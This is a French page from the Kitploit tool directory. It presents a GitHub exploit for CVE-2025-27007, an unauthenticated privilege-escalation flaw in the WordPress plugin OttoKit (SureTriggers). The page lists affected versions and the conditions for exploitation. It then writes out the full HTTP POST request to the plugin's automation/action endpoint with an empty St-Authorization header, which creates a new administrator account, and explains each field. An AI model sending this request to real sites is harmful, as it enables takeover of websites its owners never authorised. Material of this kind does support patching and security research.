Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27007-OttoKit-exploit — exploitation de la CVE-2025-27007, une vulnérabilité critique d’élévation de privilèges non authentifiée dans le plugin WordPress OttoKit (anciennement SureTriggers) | Kitploit
Outils/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-27007-OttoKit-exploit

exploitation de la CVE-2025-27007, une vulnérabilité critique d’élévation de privilèges non authentifiée dans le plugin WordPress OttoKit (anciennement SureTriggers)

Voir le dépôt
21il y a 1 anPas encore vérifié

CVE-2025-27007 : vulnérabilité d'élévation de privilèges dans OttoKit (SureTriggers)

L'exploitation de CVE-2025-27007, une vulnérabilité critique d'élévation de privilèges non autorisée dans le plugin OttoKit (anciennement connu sous le nom de SureTriggers) pour WordPress. Ce dépôt explique comment un attaquant peut créer un compte administrateur sur un site WordPress vulnérable.

Versions concernées

  • Toutes les versions d'OttoKit (SureTriggers) ≤ 1.0.82.
  • Corrigé dans la version 1.0.83.

Conditions d'exploitation

La vulnérabilité peut être exploitée dans les circonstances suivantes :

  1. OttoKit doit être installé et activé sur le site WordPress cible.
  2. Le plugin non initialisé (par exemple, aucune clé API ou "secret_key" n'est définie dans la base de données).
  3. Le site cible expose le point de terminaison de l'API REST '/wp-json/sure-triggers/v1/automation/action'.

Requête HTTP

La requête suivante cible le point de terminaison /wp-json/sure-triggers/v1/automation/action afin de créer un compte administrateur :

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


Explication de la requête

  • Point de terminaison : POST /wp-json/sure-triggers/v1/automation/action

  • St-Authorization: (vide): permet de contourner l'authentification lorsque le plugin n'est pas configuré.

  • selected_options[user_name]: Nom d'utilisateur du nouveau compte (par exemple, new_admin).

  • selected_options[user_email]: Adresse e-mail du nouveau compte (par exemple, [email protected]).

  • selected_options[password]: Mot de passe du nouveau compte (par exemple, StrongP@ssw0rd123).

  • selected_options[role]: Défini sur administrator pour accorder tous les privilèges.

  • type_event: Défini sur create_user_if_not_exists pour déclencher la création d'utilisateur.

Télécharger l’outil